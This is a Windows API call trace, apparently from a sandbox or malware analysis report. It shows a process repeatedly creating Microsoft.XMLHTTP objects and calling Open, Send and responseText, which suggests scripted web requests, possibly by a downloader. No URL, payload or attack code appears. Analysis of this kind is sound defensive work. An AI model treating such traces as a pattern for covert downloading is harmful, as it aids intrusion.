	[0259.187] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0259.188] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0259.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0259.188] ??2@YAPEAX_K@Z () returned 0x62f330
	[0259.188] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0259.188] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0259.188] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0259.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0259.188] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0259.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0259.188] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0259.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0259.190] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0259.190] SysStringLen (param_1=0x0) returned 0x0
	[0259.190] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0259.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0259.190] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77d0) returned 0x0
	[0259.190] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0259.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7838) returned 0x0
	[0259.190] ??2@YAPEAX_K@Z () returned 0x62f310
	[0259.190] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7838, pUnkSite=0x62f310) 
	[0259.190] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0259.191] XMLHTTPRequest:IUnknown:Release (This=0x49c7838) returned 0x0
	[0259.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77d0) returned 0x0
	[0259.191] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77d0) returned 0x3
	[0259.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0259.191] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0259.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0259.191] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0259.191] SysStringLen (param_1=0x0) returned 0x0
	[0259.191] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0259.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0259.191] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0259.191] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0259.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0259.191] ??2@YAPEAX_K@Z () returned 0x62f330
	[0259.191] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0259.191] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0259.191] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0259.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0259.192] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0259.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0259.192] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0259.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0259.192] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0259.192] SysStringLen (param_1=0x0) returned 0x0
	[0259.192] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0259.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0259.192] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0259.192] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0259.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0259.192] ??2@YAPEAX_K@Z () returned 0x62f310
	[0259.192] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f310) 
	[0259.192] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0259.192] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0259.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0259.192] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0259.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0259.192] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0259.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0259.193] longjmp () 
	[0259.193] longjmp () 
	[0259.193] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0259.193] SysStringLen (param_1=0x0) returned 0x0
	[0259.193] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0259.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0259.193] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77d0) returned 0x0
	[0259.193] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0259.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0259.193] ??2@YAPEAX_K@Z () returned 0x62f330
	[0259.193] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f330) 
	[0259.193] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0259.193] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0259.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77d0) returned 0x0
	[0259.193] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77d0) returned 0x3
	[0259.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0259.193] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0259.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0259.194] longjmp () 
	[0259.194] longjmp () 
	[0259.194] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0259.194] SysStringLen (param_1=0x0) returned 0x0
	[0259.194] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0259.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0259.194] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0259.194] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0259.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bc8) returned 0x0
	[0259.194] ??2@YAPEAX_K@Z () returned 0x62f310
	[0259.194] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bc8, pUnkSite=0x62f310) 
	[0259.194] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0259.194] XMLHTTPRequest:IUnknown:Release (This=0x49c5bc8) returned 0x0
	[0259.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0259.194] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0259.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0259.195] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0259.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0259.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0259.195] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0259.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0260.119] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0260.119] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0260.119] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
